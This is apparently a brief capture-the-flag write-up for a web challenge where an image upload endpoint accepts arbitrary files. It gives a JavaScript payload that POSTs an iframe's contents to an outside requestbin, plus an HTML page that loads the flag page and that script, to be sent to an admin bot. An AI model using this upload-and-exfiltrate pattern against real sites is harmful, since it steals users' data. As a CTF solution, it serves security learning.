The `uploadImage` endpoint does not have a whitelist for mimetypes, allowing uploads of arbitrary files. First, we uploaded the following js file:

```javascript
window.onload = function () {
fetch('http://requestbin.net/r/xxx', {
method: 'POST',
body: flag.contentDocument.body.innerHTML,
})
}
```

This will post the content of an iframe with id `flag` to a requestbin. Now, we just have to upload the following html file:

```htm
<iframe id="flag" src="/s/the-flag">
</iframe>
<script src="%SRC%">
</script>
```
where `%SRC%` is replaced with the location the js file got uploaded to. This will first load the flag in the iframe, and then use the previously uploaded js to leak it.

Now just post the upload link of the html file to the admin, and you'll get the flag in your requestbin.